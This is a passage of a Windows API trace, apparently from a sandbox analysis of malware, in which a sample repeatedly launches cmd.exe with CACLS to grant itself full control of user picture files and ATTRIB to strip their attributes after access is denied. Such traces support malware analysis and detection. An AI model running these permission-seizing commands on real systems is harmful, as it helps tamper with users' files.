[0183.650] ReleaseMutex (hMutex=0xf8) returned 1 [0183.650] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.650] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", lpFilePart=0x12eab4*="usertile20.bmp") returned 0x52 [0183.650] GetLastError () returned 0x5 [0183.650] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0183.650] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.650] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0183.650] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.651] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.651] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.651] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0183.651] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0183.651] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe50, dwThreadId=0xddc)) returned 1 [0183.653] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0183.830] CloseHandle (hObject=0x1b4) returned 1 [0183.830] CloseHandle (hObject=0x120) returned 1 [0183.830] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.830] ReleaseMutex (hMutex=0xf8) returned 1 [0183.831] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.831] ReleaseMutex (hMutex=0xf8) returned 1 [0183.831] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.831] ReleaseMutex (hMutex=0xf8) returned 1 [0183.831] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.831] ReleaseMutex (hMutex=0xf8) returned 1 [0183.831] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.831] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", lpFilePart=0x12eab4*="usertile20.bmp") returned 0x52 [0183.831] GetLastError () returned 0x5 [0183.831] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0183.831] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.831] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0183.831] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.831] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.831] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.831] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.831] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.831] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0183.831] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.831] ReleaseMutex (hMutex=0xf8) returned 1 [0183.831] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.832] ReleaseMutex (hMutex=0xf8) returned 1 [0183.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.832] ReleaseMutex (hMutex=0xf8) returned 1 [0183.832] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.832] ReleaseMutex (hMutex=0xf8) returned 1 [0183.832] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.832] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", lpFilePart=0x12eab4*="usertile21.bmp") returned 0x52 [0183.832] GetLastError () returned 0x5 [0183.832] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0183.832] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.832] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0183.832] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.832] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.832] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.832] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0183.832] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0183.832] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x5d0, dwThreadId=0xf6c)) returned 1 [0183.834] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0184.352] CloseHandle (hObject=0x1b4) returned 1 [0184.352] CloseHandle (hObject=0x120) returned 1 [0184.353] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.353] ReleaseMutex (hMutex=0xf8) returned 1 [0184.353] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.353] ReleaseMutex (hMutex=0xf8) returned 1 [0184.353] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.353] ReleaseMutex (hMutex=0xf8) returned 1 [0184.353] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.353] ReleaseMutex (hMutex=0xf8) returned 1 [0184.353] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.353] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp", lpFilePart=0x12eab4*="usertile21.bmp") returned 0x52 [0184.353] GetLastError () returned 0x5 [0184.353] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0184.353] LocalFree (hMem=0x1c6cc8) returned 0x0 [0184.353] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0184.353] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0184.354] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.354] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.354] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0184.354] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0184.354] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0184.354] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.354] ReleaseMutex (hMutex=0xf8) returned 1 [0184.354] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.354] ReleaseMutex (hMutex=0xf8) returned 1 [0184.354] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.354] ReleaseMutex (hMutex=0xf8) returned 1 [0184.354] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.354] ReleaseMutex (hMutex=0xf8) returned 1 [0184.354] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.354] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", lpFilePart=0x12eab4*="usertile22.bmp") returned 0x52 [0184.355] GetLastError () returned 0x5 [0184.355] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0184.355] LocalFree (hMem=0x1c6cc8) returned 0x0 [0184.355] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0184.355] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0184.355] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.355] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.355] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0184.355] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0184.355] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xfd0, dwThreadId=0x5e0)) returned 1 [0184.372] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0184.783] CloseHandle (hObject=0x1b4) returned 1 [0184.783] CloseHandle (hObject=0x120) returned 1 [0184.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.784] ReleaseMutex (hMutex=0xf8) returned 1 [0184.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.784] ReleaseMutex (hMutex=0xf8) returned 1 [0184.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.784] ReleaseMutex (hMutex=0xf8) returned 1 [0184.784] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.784] ReleaseMutex (hMutex=0xf8) returned 1 [0184.784] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.784] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp", lpFilePart=0x12eab4*="usertile22.bmp") returned 0x52 [0184.784] GetLastError () returned 0x5 [0184.784] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0184.784] LocalFree (hMem=0x1c6cc8) returned 0x0 [0184.784] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0184.784] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0184.784] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.784] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.785] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0184.785] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0184.785] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0184.785] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.785] ReleaseMutex (hMutex=0xf8) returned 1 [0184.785] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.785] ReleaseMutex (hMutex=0xf8) returned 1 [0184.785] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.785] ReleaseMutex (hMutex=0xf8) returned 1 [0184.785] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0184.785] ReleaseMutex (hMutex=0xf8) returned 1 [0184.785] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.845] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", lpFilePart=0x12eab4*="usertile23.bmp") returned 0x52 [0184.845] GetLastError () returned 0x5 [0184.845] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0184.845] LocalFree (hMem=0x1c6cc8) returned 0x0 [0184.845] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0184.845] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0184.845] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.845] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0184.845] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0184.845] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0184.845] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd48, dwThreadId=0xd80)) returned 1 [0184.847] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0185.106] CloseHandle (hObject=0x1b4) returned 1 [0185.106] CloseHandle (hObject=0x120) returned 1 [0185.106] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.107] ReleaseMutex (hMutex=0xf8) returned 1 [0185.107] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.107] ReleaseMutex (hMutex=0xf8) returned 1 [0185.107] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.107] ReleaseMutex (hMutex=0xf8) returned 1 [0185.107] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0185.107] ReleaseMutex (hMutex=0xf8) returned 1 [0185.107] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0185.107] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp", lpFilePart=0x12eab4*="usertile23.bmp") returned 0x52 [0185.107] GetLastError () returned 0x5 [0185.107] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0185.107] LocalFree (hMem=0x1c6cc8) returned 0x0 [0185.107] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 